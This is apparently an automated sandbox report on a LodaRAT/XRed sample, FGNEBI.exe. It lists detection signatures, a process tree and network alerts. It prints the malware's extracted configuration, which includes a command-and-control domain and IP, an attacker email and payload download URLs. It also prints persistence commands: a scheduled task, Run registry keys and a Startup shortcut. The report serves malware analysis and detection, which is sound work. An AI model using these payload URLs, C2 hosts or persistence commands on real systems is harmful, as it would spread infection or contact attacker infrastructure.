Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FGNEBI.exe

Overview

General Information

Sample name:FGNEBI.exe
Analysis ID:1582341
MD5:1585cb2963dceb92fbcf6c4c057e191e
SHA1:2063f45e9c82553bbc41cb4bc8e10b2d06d701c9
SHA256:67d5fc80b6bf87eb6bc3d505b0102cfdf8e8727d3da004d982467ab08ded7f0b
Tags:exeknkbkk212user-JAMESWT_MHT
Infos:

Detection

LodaRAT, XRed
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LodaRAT
Yara detected XRed
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Potentially Suspicious Malware Callback Communication
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Uses dynamic DNS services
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains executable resources (Code or Archives)
Potential key logger detected (key state polling based)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected ProcessChecker

Classification

  • System is w10x64
  • FGNEBI.exe (PID: 7916 cmdline: "C:\Users\user\Desktop\FGNEBI.exe" MD5: 1585CB2963DCEB92FBCF6C4C057E191E)
    • ._cache_FGNEBI.exe (PID: 8008 cmdline: "C:\Users\user\Desktop\._cache_FGNEBI.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
      • cmd.exe (PID: 8140 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 1644 cmdline: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1 MD5: 48C2FE20575769DE916F48EF0676A965)
      • wscript.exe (PID: 8180 cmdline: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs MD5: FF00E0480075B095948000BDC66E81F0)
    • Synaptics.exe (PID: 8036 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
      • WerFault.exe (PID: 1976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 3840 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 7932 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 1292 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • WerFault.exe (PID: 4568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2772 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • EXCEL.EXE (PID: 8104 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
  • DELPQB.exe (PID: 1772 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 2340 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • Synaptics.exe (PID: 4936 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 84A6CCB0838DA0E05CC6763275C2EE1C)
  • DELPQB.exe (PID: 4352 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe" MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 3340 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)
  • DELPQB.exe (PID: 7980 cmdline: C:\Users\user\AppData\Roaming\Windata\DELPQB.exe MD5: 66A4951D384B55633AB61ADD85514F07)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loda, LodaRATLoda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as Trojan.Nymeria, although the connection is not well-documented.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.loda
{"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
SourceRuleDescriptionAuthorStrings
FGNEBI.exeJoeSecurity_XRedYara detected XRedJoe Security
    FGNEBI.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\WLJOQW.vbsJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
        C:\ProgramData\Synaptics\RCX5CF5.tmpJoeSecurity_XRedYara detected XRedJoe Security
          C:\ProgramData\Synaptics\RCX5CF5.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            C:\Users\user\Documents\~$cache1JoeSecurity_XRedYara detected XRedJoe Security
              C:\Users\user\Documents\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Click to see the 2 entries
                SourceRuleDescriptionAuthorStrings
                00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_XRedYara detected XRedJoe Security
                  00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      00000002.00000002.2669135026.00000000048EE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                        00000007.00000002.2657472452.0000000000B90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ProcessCheckerYara detected ProcessCheckerJoe Security
                          Click to see the 8 entries
                          SourceRuleDescriptionAuthorStrings
                          0.0.FGNEBI.exe.400000.0.unpackJoeSecurity_XRedYara detected XRedJoe Security
                            0.0.FGNEBI.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

                              System Summary

                              barindex
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 172.111.138.100, DestinationIsIpv6: false, DestinationPort: 5552, EventID: 3, Image: C:\Users\user\Desktop\._cache_FGNEBI.exe, Initiated: true, ProcessId: 8008, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49727
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe
                              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Roaming\Windata\DELPQB.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\._cache_FGNEBI.exe, ProcessId: 8008, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WLJOQW
                              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\._cache_FGNEBI.exe, ProcessId: 8008, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WLJOQW.lnk
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8140, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1, ProcessId: 1644, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Michael Haag: Data: Command: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, CommandLine|base64offset|contains: Y , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\._cache_FGNEBI.exe" , ParentImage: C:\Users\user\Desktop\._cache_FGNEBI.exe, ParentProcessId: 8008, ParentProcessName: ._cache_FGNEBI.exe, ProcessCommandLine: WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, ProcessId: 8180, ProcessName: wscript.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Synaptics\Synaptics.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\FGNEBI.exe, ProcessId: 7916, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver
                              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\ProgramData\Synaptics\Synaptics.exe, ProcessId: 8036, TargetFilename: C:\Users\user\AppData\Local\Temp\JUIlYPbf.xlsm
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:34:30.542679+010020448871A Network Trojan was detected192.168.2.849712172.217.16.206443TCP
                              2024-12-30T11:34:30.560462+010020448871A Network Trojan was detected192.168.2.849711172.217.16.206443TCP
                              2024-12-30T11:34:31.719148+010020448871A Network Trojan was detected192.168.2.849716172.217.16.206443TCP
                              2024-12-30T11:34:31.719400+010020448871A Network Trojan was detected192.168.2.849717172.217.16.206443TCP
                              2024-12-30T11:34:38.590833+010020448871A Network Trojan was detected192.168.2.849723172.217.16.206443TCP
                              2024-12-30T11:34:38.619255+010020448871A Network Trojan was detected192.168.2.849724172.217.16.206443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:34:32.378978+010028221161Malware Command and Control Activity Detected192.168.2.849727172.111.138.1005552TCP
                              2024-12-30T11:35:08.620830+010028221161Malware Command and Control Activity Detected192.168.2.849744172.111.138.1005552TCP
                              2024-12-30T11:35:44.894680+010028221161Malware Command and Control Activity Detected192.168.2.849752172.111.138.1005552TCP
                              2024-12-30T11:36:21.071387+010028221161Malware Command and Control Activity Detected192.168.2.849756172.111.138.1005552TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:34:30.992449+010028326171Malware Command and Control Activity Detected192.168.2.84971569.42.215.25280TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849740172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849742172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849727172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849754172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849743172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849749172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849746172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849753172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849744172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849755172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849756172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849752172.111.138.1005552TCP
                              2024-12-30T11:34:14.559856+010028498851Malware Command and Control Activity Detected192.168.2.849747172.111.138.1005552TCP
                              2024-12-30T11:34:32.378978+010028498851Malware Command and Control Activity Detected192.168.2.849727172.111.138.1005552TCP
                              2024-12-30T11:34:41.461796+010028498851Malware Command and Control Activity Detected192.168.2.849740172.111.138.1005552TCP
                              2024-12-30T11:34:50.555738+010028498851Malware Command and Control Activity Detected192.168.2.849742172.111.138.1005552TCP
                              2024-12-30T11:34:59.575488+010028498851Malware Command and Control Activity Detected192.168.2.849743172.111.138.1005552TCP
                              2024-12-30T11:35:08.620830+010028498851Malware Command and Control Activity Detected192.168.2.849744172.111.138.1005552TCP
                              2024-12-30T11:35:17.680424+010028498851Malware Command and Control Activity Detected192.168.2.849746172.111.138.1005552TCP
                              2024-12-30T11:35:26.770725+010028498851Malware Command and Control Activity Detected192.168.2.849747172.111.138.1005552TCP
                              2024-12-30T11:35:35.884801+010028498851Malware Command and Control Activity Detected192.168.2.849749172.111.138.1005552TCP
                              2024-12-30T11:35:44.894680+010028498851Malware Command and Control Activity Detected192.168.2.849752172.111.138.1005552TCP
                              2024-12-30T11:35:53.901669+010028498851Malware Command and Control Activity Detected192.168.2.849753172.111.138.1005552TCP
                              2024-12-30T11:36:02.973449+010028498851Malware Command and Control Activity Detected192.168.2.849754172.111.138.1005552TCP
                              2024-12-30T11:36:11.993456+010028498851Malware Command and Control Activity Detected192.168.2.849755172.111.138.1005552TCP
                              2024-12-30T11:36:21.071387+010028498851Malware Command and Control Activity Detected192.168.2.849756172.111.138.1005552TCP

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Source: FGNEBI.exeAvira: detected
                              Source: FGNEBI.exeAvira: detected
                              Source: http://xred.site50.net/syn/Synaptics.rarhAvira URL Cloud: Label: malware
                              Source: http://xred.site50.net/syn/SSLLibrary.dlDAvira URL Cloud: Label: malware
                              Source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbsAvira: detection malicious, Label: VBS/Runner.VPJI
                              Source: C:\ProgramData\Synaptics\RCX5CF5.tmpAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\RCX5CF5.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: TR/Dldr.Agent.SH
                              Source: C:\Users\user\Documents\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                              Source: FGNEBI.exeMalware Configuration Extractor: XRed {"C2 url": "xred.mooo.com", "Email": "xredline1@gmail.com", "Payload urls": ["http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download", "https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1", "http://xred.site50.net/syn/SUpdate.ini", "https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download", "https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1", "http://xred.site50.net/syn/Synaptics.rar", "https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download", "https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1", "http://xred.site50.net/syn/SSLLibrary.dll"]}
                              Source: C:\ProgramData\Synaptics\RCX5CF5.tmpReversingLabs: Detection: 100%
                              Source: C:\ProgramData\Synaptics\Synaptics.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeReversingLabs: Detection: 47%
                              Source: C:\Users\user\Documents\~$cache1ReversingLabs: Detection: 100%
                              Source: FGNEBI.exeReversingLabs: Detection: 92%
                              Source: FGNEBI.exeVirustotal: Detection: 87%Perma Link
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.4% probability
                              Source: C:\ProgramData\Synaptics\RCX5CF5.tmpJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Documents\~$cache1Joe Sandbox ML: detected
                              Source: FGNEBI.exeJoe Sandbox ML: detected
                              Source: FGNEBI.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49712 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49711 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49718 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.8:49719 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49723 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 172.217.16.206:443 -> 192.168.2.8:49724 version: TLS 1.2
                              Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: [autorun]
                              Source: FGNEBI.exe, 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: autorun.inf
                              Source: Synaptics.exe, 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [autorun]
                              Source: Synaptics.exe, 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: autorun.inf
                              Source: FGNEBI.exeBinary or memory string: [autorun]
                              Source: FGNEBI.exeBinary or memory string: [autorun]
                              Source: FGNEBI.exeBinary or memory string: autorun.inf
                              Source: RCX5CF5.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX5CF5.tmp.0.drBinary or memory string: [autorun]
                              Source: RCX5CF5.tmp.0.drBinary or memory string: autorun.inf
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: [autorun]
                              Source: Synaptics.exe.0.drBinary or memory string: autorun.inf
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: [autorun]
                              Source: ~$cache1.3.drBinary or memory string: autorun.inf
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DADD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00DADD92
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DE2044
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DE219F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DE24A9
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00DD6B3F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00DD6E4A
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DDF350
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00DDFDD2
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDFD47 FindFirstFileW,FindClose,2_2_00DDFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00232044
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0023219F
